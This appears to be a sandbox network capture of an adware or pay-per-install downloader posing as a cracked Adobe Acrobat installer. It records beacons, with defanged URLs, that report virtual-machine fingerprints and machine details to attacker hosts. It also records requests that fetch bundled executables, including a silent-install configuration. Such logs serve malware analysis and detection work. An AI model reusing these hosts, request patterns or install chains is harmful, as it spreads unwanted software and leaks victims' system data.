<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "hXXp://VVV.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
</HEAD><BODY>
<H1>ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests.
<BR clear="all">
<HR noshade size="1px">
<PRE>
Generated by cloudfront (CloudFront)
Request ID: 2V_U9yCYMa6XDOCQ6ClUAPr3RaMHJ3lbx2Et3RQgqm9-CypCvoY-kg==
</PRE>
<ADDRESS>
</ADDRESS>
</BODY></HTML>


GET /report.php?typ=sys&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&transId=139867460&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.7188832209728342 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: ee.wintervenepest.bid


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:30 GMT
Content-Length: 0


GET /stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: off.ncongruousric.bid
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 67426
Connection: keep-alive
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="583afdd9a9098.exe"
X-Powered-By: ASP.NET
Date: Sun, 27 Nov 2016 15:38:02 GMT
X-Cache: Miss from cloudfront
Via: 1.1 e4a44efc4b3241dc23019df63a1f645c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: mqZv_Hk7WsVo5gRdzQsl8YqdXLbfXdm6CwSxY3B06yeKlYsWx7oY_w==
[binary body not reproduced: 67426-byte PE32 executable served as 583afdd9a9098.exe; MZ/PE headers with sections .text, .rdata, .data, .ndata, .rsrc, .reloc. The .ndata section is the NSIS installer's data section, consistent with the NSIS_Inetc User-Agent of the request that fetched it]

<<< skipped >>>

POST hXXp://ee.wintervenepest.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.wintervenepest.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 602

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=1912&id[]=1913&id[]=2557&id[]=2558&id[]=2559&id[]=2560&id[]=2561&id[]=2562&id[]=2563&id[]=2834&id[]=2835&id[]=3023&id[]=3024&id[]=3517&id[]=3518&id[]=3519&id[]=3520&id[]=3617&id[]=3618&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675&id[]=1914&id[]=1915&id[]=2534&id[]=2536&id[]=2537&id[]=2538&id[]=2539&id[]=2541&id[]=2542&id[]=2543&id[]=2544&id[]=2545&id[]=2546&id[]=2547&id[]=2548&id[]=2549&id[]=2550&id[]=2551&id[]=2552&id[]=2553&id[]=2554&id[]=2555&id[]=2556&id[]=3266&id[]=2695
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:22 GMT
Connection: close
Content-Length: 76128
[binary body not reproduced: 76128 bytes served as text/html with no recognisable file header in the captured prefix]

<<< skipped >>>

GET /normal_bg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 26781
Connection: keep-alive
Date: Thu, 22 Sep 2016 18:01:12 GMT
Last-Modified: Mon, 13 Jun 2016 11:29:07 GMT
ETag: "b5b0ebe137c0293f816eaac3de2b4e51"
Accept-Ranges: bytes
Server: AmazonS3
Age: 74433
X-Cache: Hit from cloudfront
Via: 1.1 14484a063800eaed878a3068abf4dfac.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RczU8nabXC7YY05ZRPnbSYN4ruZ16XLLgkDlYC3eb6xeh2YUccPUaQ==
[binary body not reproduced: JPEG, 26781 bytes, with Exif and XMP metadata; xmp:CreatorTool="Adobe Photoshop Elements 12.0 Windows", xmpMM:InstanceID="xmp.iid:889F23E5F49B11E4A1FBA1E3C36AE7EE", xmpMM:DocumentID="xmp.did:889F23E6F49B11E4A1FBA1E3C36AE7EE", derived from stRef:instanceID="xmp.iid:889F23E3F49B11E4A1FBA1E3C36AE7EE" / stRef:documentID="xmp.did:889F23E4F49B11E4A1FBA1E3C36AE7EE"]

<<< skipped >>>

GET /9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: aclick.adhoc2.net
Connection: Keep-Alive


HTTP/1.1 302 Found
Date: Sun, 27 Nov 2016 15:38:41 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da060fb656d4e2b9f0756b182bd523f481480261121; expires=Mon, 27-Nov-17 15:38:41 GMT; path=/; domain=.adhoc2.net; HttpOnly
Location: hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999
Server: cloudflare-nginx
CF-RAY: 3086ab26d67b4014-SOF
<a href="hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999">Found</a>


GET /get.php?ses=482796663418412224 HTTP/1.0
Host: away.yosauruslega.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 753152
Connection: close
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 01 Jan 2014 00:00:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Access-Control-Allow-Origin: *
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="cpSetup.exe"
Date: Sun, 27 Nov 2016 15:37:18 GMT
X-Cache: Miss from cloudfront
Via: 1.1 23d92aa442d5ae9ed0313643d8764687.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Tb6ZJ-_nkdTtqyG7ZIBb1o9GqM223LHzFjNSNfbX87GUeAUw5AtP-Q==
[binary body not reproduced: 753152-byte PE32 executable served as cpSetup.exe; MZ/PE headers with sections .text, .rdata, .data, .gfids, .rsrc, .reloc. The .gfids section is the Control Flow Guard function-ID table emitted by recent MSVC builds]

<<< skipped >>>

GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== HTTP/1.1
Cache-Control: max-age = 564348
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 12 Oct 2016 22:33:53 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: g.symcd.com


HTTP/1.1 200 OK
Server: nginx/1.10.1
Content-Type: application/ocsp-response
Content-Length: 1362
content-transfer-encoding: binary
Cache-Control: max-age=563498, public, no-transform, must-revalidate
Last-Modified: Sun, 27 Nov 2016 04:06:13 GMT
Expires: Sun, 4 Dec 2016 04:06:13 GMT
Date: Sun, 27 Nov 2016 15:38:44 GMT
Connection: keep-alive
[binary body not reproduced: DER-encoded OCSP response, 1362 bytes; producedAt/thisUpdate 2016-11-27 04:06:13Z, nextUpdate 2016-12-04 04:06:13Z; signed by "GeoTrust Global CA TGV OCSP Responder 4", a responder certificate issued by GeoTrust Global CA and valid 2015-12-03 17:02:30Z to 2016-12-14 17:02:30Z]

<<< skipped >>>

GET /launch_v5.php?p=sevenzip&pid=2735&tid=10958132&b_typ=pe&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBN&reb=1&ic= HTTP/1.0
Host: get.enomenalco.club
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 871
Connection: close
Date: Sun, 27 Nov 2016 15:38:05 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 3df8c233328fbbb4fd91eb496d73f2d8.cloudfront.net (CloudFront)
X-Amz-Cf-Id: e8d2sKG-Rk6x8CGWhvDe4g0XzMRR9SWs9pQwMPHTkmgpIXg8EyIF4Q==
files=4.t1=dl.u1=hXXp://get.ynoptisticglob.bid/?affId=1006&appTitle=Ad
obe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&s
etupName=cpSetup&appVersion=2.92&instId=11&exe=1.n1=cpSetup.exe.b1=cp.
c1=sevenzip-1.s1=0.m1=0.d1=0.t2=dl.u2=hXXp://wet.sodcattilyrem.bid/stu
b_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=Adobe Acrobat%2
0XI Pro 11.0.18 M.n2=sevensetup.exe.b2=rx.c2=sevenzip-1.s2=0.m2=
0.d2=0.t3=dl.u3=hXXp://VVV.dosecuretrips.com/download.php?version=1.1.
5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/dow
nloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmd
line]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_i
nstaller.png.n3=Setup__2140_il2.exe.b3=am.c3=2140-sevenzip.s3=0.m3=0.d
3=0.fn1=Components.fn2=File opener.fn3=File finder.fn4=SevenZip.ftitle
=to run your file.itype=silent...


GET /taveara?q=Adobe Acrobat XI Pro 11.0.18 M HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: gurusetman.info
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Date: Sun, 27 Nov 2016 15:38:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dcffe8a79a413e2d5aac5285621a4dd561480261106; expires=Mon, 27-Nov-17 15:38:26 GMT; path=/; domain=.gurusetman.info; HttpOnly
X-Powered-By: PHP/5.4.37
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Last-Modified: Sun, 27 Nov 2016 15:38:26 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: hXXp://tobacted.info?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: *
Access-Control-Request-Headers: *
Server: cloudflare-nginx
CF-RAY: 3086aacc60c92950-OTP

<<< skipped >>>

GET /css/twin.css HTTP/1.1
Accept: text/css
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css
Date: Sun, 27 Nov 2016 15:38:42 GMT
ETag: W/"58372388-3b06f"
Last-Modified: Thu, 24 Nov 2016 17:29:44 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
transfer-encoding: chunked
Connection: keep-alive

<<< skipped >>>

GET /?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: tobacted.info
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Nov 2016 15:38:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d6eda53e888ba9059880b27824ddbd7461480261107; expires=Mon, 27-Nov-17 15:38:27 GMT; path=/; domain=.tobacted.info; HttpOnly
X-Powered-By: PHP/5.4.16
Location: hXXp://elja.linggyp.ru/9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye
Server: cloudflare-nginx
CF-RAY: 3086aad035062914-OTP

<<< skipped >>>

GET /launch_reb.php?p=sevenzip&tid=10958132&pid=2735&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBNdWx0aWxpbmd1YWwgKyBDcmFjaw==&b_typ=pe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: get.ercationiv.club
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 165
Connection: keep-alive
Date: Sun, 27 Nov 2016 15:38:03 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 1d32f672764a20290d04a16248d04c57.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pwOrHWNvHEzqRYu6kTcPvSZ6KfYulsUHBz183NeW7ON1TJMeH6lwVw==
s=first..u=hXXp://off.ncongruousric.bid/stub_maker.php?program=sevenzi
p&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.
18 Multilingual + Crack


GET /9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: elja.linggyp.ru
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sun, 27 Nov 2016 15:37:49 GMT
Content-Type: application/exe; charset=windows-1251
Content-Length: 3951944
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Nov 2016 15:37:49 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Adobe Acrobat XI Pro 11.0.exe"
Content-Transfer-Encoding: binary
Pragma: public

<<< skipped >>>

GET /stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M HTTP/1.0
Host: wet.sodcattilyrem.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 60676
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="583afdedde2bb_ua.exe"
X-Powered-By: ASP.NET
Date: Sun, 27 Nov 2016 15:38:21 GMT
X-Cache: Miss from cloudfront
Via: 1.1 1280e48937eca7de58e32cd35415f48a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: oQ7y_HWecgaCXkCxikw8vq21OYN4z3k2ejmMGV3mJIa-ra6vjGhk6w==

<<< skipped >>>

POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.secularistsarakolet.site
Content-Length: 523
Connection: Keep-Alive
Cache-Control: no-cache

Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv=&Sysid=541B298A93BFE2600111218F9ABFCC32&Sysid1=52D311BE788EE1E500992B8A6A042C2B&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=Setup__2140_il2.exe&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64&exe=Setup__2140_il2&ffver=49.0.1.6109&lang_DfltUser=0409&mac=MDA1MDU2MzNCNTUxMDAwMAA=&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA==&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1480261117&ver=1.1.5.26
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 27 Nov 2016 15:38:39 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
4d9....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//E
N">.<html>. <head>. <meta http-equiv="cont
ent-type" content="text/html; charset=UTF-8" /> . <title&
gt;DownloadManagerModern</title>...<script type="text/javascr
ipt">... var g_notCompatibleWithUpdaterComps = ['LootFindKP'];...
var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba
', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity',
'TotalSecurityIN', 'TotalSecurityRU'];...</script> . <
base href="hXXp://VVV.secularistsarakolet.site:80/index.php" />.<
;link rel="stylesheet" type="text/css" href="hXXp://cdn2.leadingdownlo
ad.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" /> <
;script type="text/javascript" src="hXXp://cdn1.leadingdownload.com/V3
8/amipb.js"></script>. <script type="text/javascrip
t">.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.
png";..var g_r_appname="installer";..var g_r_cmdline="\/S";..
var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_addition
al_offer_list = '1';. var g_finish_install_button = '1';.
var g_popup_install_all = '1';. var g_eula = 'VGh
lIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZ..32e8..pb
GUgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmc
gdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51a
W5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiw

<<< skipped >>>

GET /crls/secureca.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 09:30:22 GMT
If-None-Match: "b6a46da3cf1aa70c10b101b12c9733f4:1476351022"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.geotrust.com


HTTP/1.1 200 OK
Server: Apache
ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"
Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT
Date: Sun, 27 Nov 2016 15:38:44 GMT
Content-Length: 325
Connection: keep-alive
Content-Type: application/pkix-crl


GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0
Host: VVV.dosecuretrips.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Setup__2140_il2.exe"
Content-Type: application/x-msdownload
Date: Sun, 27 Nov 2016 15:38:33 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Nov 2016 15:38:33 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: Setup__2140_il2.exe
Content-Length: 716288
Connection: Close

<<< skipped >>>

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com


HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 19:25:21 GMT
Expires: Mon, 28 Nov 2016 19:25:21 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 245603
Cache-Control: public, max-age=345600



GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com


HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 19:31:39 GMT
Expires: Mon, 28 Nov 2016 19:31:39 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 245227
Cache-Control: public, max-age=345600


GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: clients1.google.com


HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 24 Nov 2016 20:12:58 GMT
Expires: Mon, 28 Nov 2016 20:12:58 GMT
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Age: 242749
Cache-Control: public, max-age=345600


GET /movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
Date: Sun, 27 Nov 2016 15:38:41 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 36844
Connection: keep-alive

<<< skipped >>>

GET /js/main.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/javascript
Date: Sun, 27 Nov 2016 15:38:45 GMT
ETag: W/"582622c6-368b"
Last-Modified: Fri, 11 Nov 2016 19:57:58 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 4244
Connection: keep-alive

<<< skipped >>>

GET /img/favicon/cinemaden.com/favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: tour.cinemaden.com
Connection: Keep-Alive
Cookie: _ga=GA1.2.1439064958.1480261126; _gat=1


HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/x-icon
Date: Sun, 27 Nov 2016 15:38:47 GMT
ETag: "57325088-1536"
Last-Modified: Tue, 10 May 2016 21:20:08 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 5430
Connection: keep-alive

<<< skipped >>>

GET /crls/secureca.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 09:30:22 GMT
If-None-Match: "b6a46da3cf1aa70c10b101b12c9733f4:1476351022"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.geotrust.com


HTTP/1.1 200 OK
Server: Apache
ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"
Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT
Date: Sun, 27 Nov 2016 15:38:44 GMT
Content-Length: 325
Connection: keep-alive
Content-Type: application/pkix-crl


GET /stats.php?bu=cp&c=&step= HTTP/1.0
Host: get.gunnightmar.club
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Sun, 27 Nov 2016 15:38:23 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 62fcc6919801a5602c53d055b177c4f9.cloudfront.net (CloudFront)
X-Amz-Cf-Id: v0nTILH8B7lO0atK9IGzAtS5FRJUiahDpMIx_3u_xZEqL90Dvtp00w==


GET /stats.php?bu=rx&c=&step=1 HTTP/1.0
Host: get.gunnightmar.club
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Date: Sun, 27 Nov 2016 15:38:32 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 d79148f01e44f5598c15bdd5ce1c1997.cloudfront.net (CloudFront)
X-Amz-Cf-Id: qKy6xKjkeNG7i9e4v7zZ6rDXDkkh0I6BRjbfGxCgBigmeRoNylQypw==


